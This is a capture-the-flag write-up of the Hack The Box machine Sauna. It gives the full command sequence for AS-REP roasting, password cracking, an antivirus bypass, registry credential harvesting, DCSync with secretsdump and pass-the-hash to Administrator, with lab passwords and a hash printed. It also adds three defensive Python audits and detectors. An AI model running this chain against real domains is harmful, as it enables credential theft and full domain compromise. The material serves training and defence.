Sauna is a Windows machine from Hack The Box that covers a lot of different tools, such as Impacket, WinPEAS, BloodHound, and Evil-WinRM. We start by finding a couple of users on a web page, which leads us to a Kerberoast brute force attack to grab an authentication hash. Once we gain access as that user, we find saved auto-logon credentials for another user that we can use. We then perform a DCSync attack, which dumps all the domain hashes, including the Administrator's, and that leads to a pass-the-hash attack.
We can enumerate ports and services with nmap using the command sudo nmap -v -sV -sC -oN nmap 10.10.10.175 -p-
We are given 20 open ports, which is common for a Windows server running as a Domain Controller:
Ports 389 and 3268 (LDAP) show the domain name EGOTISTICAL-BANK.LOCAL; let's keep that in mind. For now, let's take a look at the web page.
Going to http://10.10.10.175 shows a web page for Egotistical Bank:
While doing some manual enumeration, we come across some employee names on the About Us section of the website:
There is a real danger in exposing employee names for everyone to see: they are the raw material for username guessing. I created a text file of the employee names:
Now we can use username-anarchy to generate some usernames and hopefully we can find one that we can use:
And we can see our output:
There is a great post on attacking Kerberos that includes AS-REP Roasting. Usually, when you request authentication through Kerberos, the requesting party has to pre-authenticate itself to the Domain Controller. However, there is an account option, DONT_REQ_PREAUTH, where the DC will hand the AS-REP (from which a crackable hash is extracted) to an unauthenticated requester.
We can use Impacket's GetNPUsers to look for any users that have this option enabled with the command while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175; done < usernames.txt
And we get a hit for user fsmith
I saved the hash to a file called hash.txt, and we can crack it using John the Ripper with the command john hash.txt --wordlist=<path to rockyou.txt>
And we are given the password Thestrokes23.
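From the defensive side, the condition GetNPUsers.py hunted for above is a single userAccountControl bit. The following is an added example (not from the original write-up) that audits a directory for accounts with pre-authentication disabled; the ldap3 package, the bind credentials and the sample entries are assumptions, and the offline helpers run on constructed data.

```python
# Audit for AS-REP roastable accounts: DONT_REQ_PREAUTH set on an enabled user.
# Added example; ldap3 (third-party) is only needed for the live query.

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit that GetNPUsers relies on

# LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803) filters on one UAC bit server-side.
ASREP_FILTER = (
    "(&(objectClass=user)(objectCategory=person)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

def asrep_roastable(uac: int) -> bool:
    """True if the DC would answer this account's AS-REQ without pre-authentication."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE)

def find_exposed(entries):
    """Return sAMAccountNames whose UAC flags expose them to AS-REP roasting."""
    return sorted(e["sAMAccountName"] for e in entries
                  if asrep_roastable(int(e["userAccountControl"])))

def query_dc(server: str, bind_user: str, password: str, base_dn: str):
    """Live variant: pull the same attributes from a DC over LDAP (assumed credentials)."""
    from ldap3 import Server, Connection, ALL
    conn = Connection(Server(server, get_info=ALL), user=bind_user,
                      password=password, auto_bind=True)
    conn.search(base_dn, ASREP_FILTER,
                attributes=["sAMAccountName", "userAccountControl"])
    return [{"sAMAccountName": str(e.sAMAccountName),
             "userAccountControl": int(e.userAccountControl.value)}
            for e in conn.entries]

# Constructed sample entries (0x200 = NORMAL_ACCOUNT); fsmith mirrors the box's finding.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jdoe",   "userAccountControl": 0x200},
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x200 | UF_DONT_REQUIRE_PREAUTH
                                                       | UF_ACCOUNTDISABLE},
]

if __name__ == "__main__":
    print("AS-REP roastable accounts:", find_exposed(SAMPLE_ENTRIES))  # ['fsmith']
```

Clearing the flag on every hit (or at least giving those accounts long, random passwords) closes the path used on this box.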
We can confirm our findings using crackmapexec with the command crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23
We confirm our access to SMB but let’s see if we have remote access with crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
And we do, so now we can use Evil-WinRM to establish a shell connection with evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
And we have access as FSmith. The user hash is found in FSmith’s Desktop directory:
I love Evil-WinRM’s ability to upload files and avoid any possible antivirus restrictions. We are going to use WinPeas to enumerate the system and see if we can find anything useful. First let’s go into Fsmith’s temp folder:
Then we can apply the AV bypass with the command Bypass-4MSI and then upload our WinPEAS binary with upload <local path to WinPEAS exe file>
Then we can run it with ./WinPEASx64.exe
Looking through the output, we find two interesting things, first is the username of svc_loanmgr:
And the second thing, the password:
It does point out that the default username is svc_loanmanager, but we can check what the actual username is by looking at the Users directory:
We also could have found the password with this handy command that queries the registry: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
We can see if we have a remote connection for user svc_loanmgr with crackmapexec winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
And we can use Evil-WinRM again with evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
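The Winlogon values just queried are a common host-hardening check. The following is an added example (not from the original write-up) that parses the output of that reg query command and reports cleartext auto-logon credentials; the sample output is constructed to look like this box's registry, and the domain value is a placeholder.

```python
import re

# Parses `reg query "HKLM\...\Winlogon"` output and flags cleartext auto-logon.
# Added example; the sample text below is constructed, not captured from the box.

REG_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")

def parse_reg_query(text: str) -> dict:
    """Return {value_name: data} for every 'name  REG_TYPE  data' line."""
    values = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            values[m.group(1)] = m.group(3)
    return values

def autologon_findings(values: dict) -> list:
    """Describe why the Winlogon values are risky; empty list means nothing found."""
    findings = []
    user = values.get("DefaultUserName", "<unset>")
    domain = values.get("DefaultDomainName", "<unset>")
    if values.get("DefaultPassword"):
        # A cleartext DefaultPassword is readable by any local user; Windows can
        # instead keep the auto-logon password as an LSA secret.
        findings.append(f"cleartext DefaultPassword present for {domain}\\{user}")
    if values.get("AutoAdminLogon", "0").strip() == "1":
        findings.append(f"AutoAdminLogon enabled for {domain}\\{user}")
    return findings

# Constructed sample resembling the value names shown in the write-up.
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLE-DOMAIN
    DefaultUserName    REG_SZ    svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
"""

if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_OUTPUT)):
        print("FINDING:", finding)
```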
I tried running WinPEAS again as svc_loanmgr but was unable to find anything useful. However, since we are dealing with Active Directory, a great tool to use is Bloodhound.
Installing it is pretty straightforward; I found a good instructions page here.
Once you have BloodHound all set up, let's collect the data we need by running SharpHound on the target system. You can find the SharpHound binary here. From the SharpCollection directory, we can use this command to locate our file: find . | grep -i sharphound
Copy that to the directory you want to upload it from, and then we can repeat the steps from before:
Once it's done running, you should have a zip file that has been saved:
Using the download command, we can download the zip file to our current directory:
Now that we have our SharpHound zip file, let's fire up BloodHound. First, let's start the neo4j console with sudo neo4j console
Then on a separate terminal window, just type bloodhound
A login page should automatically open asking for your credentials:
Once logged in, we can upload the zip file by just clicking-and-dragging it onto the page:
Once it's done, we can search for the user we want to start with, which in this case is svc_loanmgr:
Right-click on the user node and Mark As Owned
Then head over to Analysis:
We can explore the DCSync attack. More information on that can be found here.
We see that our node has GetChanges and GetChangesAll rights to the domain:
According to the article, the GetChanges and GetChangesAll rights are both required to execute this attack:
Right-click on either the GetChanges or GetChangesAll line between the nodes and you can click on Help for more information:
The Info section also confirms our findings:
And the Abuse Info goes into how we can exploit this:
For a DCSync attack, we can use Impacket's secretsdump with the command secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
And we are given a couple of hashes, but most importantly, the Administrator hash. We can perform a Pass-The-Hash attack with Impacket’s wmiexec.py with the command wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
And we are in:
The root hash can be found in the Administrator’s Desktop Directory:
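The DCSync step above is loud if the right audit policy is on: a replication request shows up as Security event 4662 on the DC whose Properties field carries the DS-Replication-Get-Changes control-access GUIDs. The following is an added detection example (not from the original write-up) that flags such events when the requester is not a known Domain Controller account; the event records are constructed, and the DC account name is a placeholder.

```python
import re

# Flags DCSync-style replication from non-DC principals using Security event 4662.
# Added example; requires the "Audit Directory Service Access" subcategory so that
# 4662 is logged. Events below are constructed, not captured from the box.

# Control-access right GUIDs that BloodHound shows as GetChanges / GetChangesAll.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")

def dcsync_alerts(events, dc_accounts):
    """Return one alert string per 4662 event that exercises replication rights
    from an account not in dc_accounts (DC machine accounts replicate legitimately)."""
    dc_accounts = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if not rights:
            continue
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if ev["SubjectUserName"].upper() in dc_accounts:
            continue
        alerts.append(f"possible DCSync by {subject} on {ev['ObjectName']}: {', '.join(rights)}")
    return alerts

# Constructed sample events; DC01$ stands in for the real DC's machine account.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},   # unrelated schema GUID
]

if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_EVENTS, dc_accounts=["DC01$"]):
        print(alert)
```

Removing the two replication rights from svc_loanmgr (BloodHound's Abuse Info shows exactly which ACEs grant them) is the fix; the alert above is the compensating control while that is pending.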
All in all, this was a fun box to learn a lot from. Understanding the different tools available to you, such as Impacket or BloodHound, will help you become a better pentester. This box was challenging in that the exploit paths weren't always very visible. I found the use of the Kerberoasting attack built on the employee names to be very realistic. Hope you enjoyed the write-up!
Feel free to leave a comment if you have any questions or suggestions!